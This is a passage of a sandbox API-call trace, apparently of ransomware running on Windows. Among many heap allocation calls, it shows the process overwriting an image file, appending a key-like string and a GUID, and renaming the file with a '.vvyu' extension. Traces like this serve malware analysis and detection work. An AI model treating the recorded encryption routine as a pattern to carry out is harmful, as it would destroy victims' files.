dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d39f40 [0193.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x204) returned 0x2d3b678 [0193.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fa0 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bec8 [0193.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x210) returned 0x2d2fc90 [0193.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10c) returned 0x2c03ca0 [0193.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37890 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x108) returned 0x2c4bc98 [0193.679] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f40 | out: hHeap=0x6a0000) returned 1 [0193.679] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x200) returned 0x2d2fea8 [0193.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0193.680] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2d300b0 [0193.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0193.680] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6eaa30 | out: hHeap=0x6a0000) returned 1 [0193.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c31700 | out: hHeap=0x6a0000) returned 1 [0193.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d300b0 | out: hHeap=0x6a0000) returned 1 [0193.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0193.681] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bc98 | out: hHeap=0x6a0000) returned 1 [0193.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.682] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fea8 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f70 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fb8 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f58 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f28 | out: hHeap=0x6a0000) returned 1 [0193.683] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0193.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84d30 | out: hHeap=0x6a0000) returned 1 [0193.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0193.684] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39f10 | out: hHeap=0x6a0000) returned 1 [0193.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42148 | out: hHeap=0x6a0000) returned 1 [0193.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0193.685] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446e8 | out: hHeap=0x6a0000) returned 1 [0193.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9bd8 | out: hHeap=0x6a0000) returned 1 [0193.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0193.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0193.687] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0193.687] WriteFile (in: hFile=0x584, lpBuffer=0x2d49778*, nNumberOfBytesToWrite=0x18907, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d49778*, lpNumberOfBytesWritten=0x30ffb14*=0x18907, lpOverlapped=0x0) returned 1 [0193.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.689] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0x1890c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0193.689] WriteFile (in: hFile=0x584, lpBuffer=0x6d5c88*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x6d5c88*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0193.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6d5c88 | out: hHeap=0x6a0000) returned 1 [0193.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c701a0 [0193.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0193.690] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0193.690] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0193.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0193.690] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c701a0 | out: hHeap=0x6a0000) returned 1 [0193.690] WriteFile (in: hFile=0x584, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0193.691] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.691] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0193.691] WriteFile (in: hFile=0x584, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0193.691] CloseHandle (hObject=0x584) returned 1 [0193.693] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47828 [0193.696] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x890) returned 0x2d49778 [0193.696] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47828 | out: hHeap=0x6a0000) returned 1 [0193.696] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\YwgWoXY4_d Sr.jpg" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\ywgwoxy4_d sr.jpg"), lpNewFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\P5pCqlWF\\YwgWoXY4_d Sr.jpg.vvyu" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\p5pcqlwf\\ywgwoxy4_d sr.jpg.vvyu")) returned 1 [0193.697] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d49778 | out: hHeap=0x6a0000) returned 1 [0193.698] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0193.698] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0193.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c2d920 | out: hHeap=0x6a0000) returned 1 [0193.701] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbbab02f0, ftCreationTime.dwHighDateTime=0x1d89c16, ftLastAccessTime.dwLowDateTime=0x88af9530, ftLastAccessTime.dwHighDateTime=0x1d89cbd, ftLastWriteTime.dwLowDateTime=0x88af9530, ftLastWriteTime.dwHighDateTime=0x1d89cbd, nFileSizeHigh=0x0, nFileSizeLow=0x1890c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="YwgWoXY4_d Sr.jpg", cAlternateFileName="YWGWOX~1.JPG")) returned 0 [0193.701] FindClose (in: hFindFile=0x2cbfa10 | out: hFindFile=0x2cbfa10) returned 1 [0193.701] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b730 | out: hHeap=0x6a0000) returned 1 [0193.702] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0193.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6eaa30 [0193.702] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0193.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.702] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.702] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.703] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.703] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.704] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.704] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.705] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.705] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.706] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.706] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.707] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.707] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.708] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.708] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.709] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.709] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.710] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.710] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.711] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.711] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.712] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.712] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.713] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.713] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.714] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.714] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.715] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.715] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.716] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.716] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.717] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.717] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.718] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.718] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.719] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.719] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.720] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.720] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.721] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.721] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.722] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.722] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.723] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.723] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.724] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.724] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.725] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.725] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.726] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.726] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.727] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.727] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.728] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.728] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.729] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.729] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 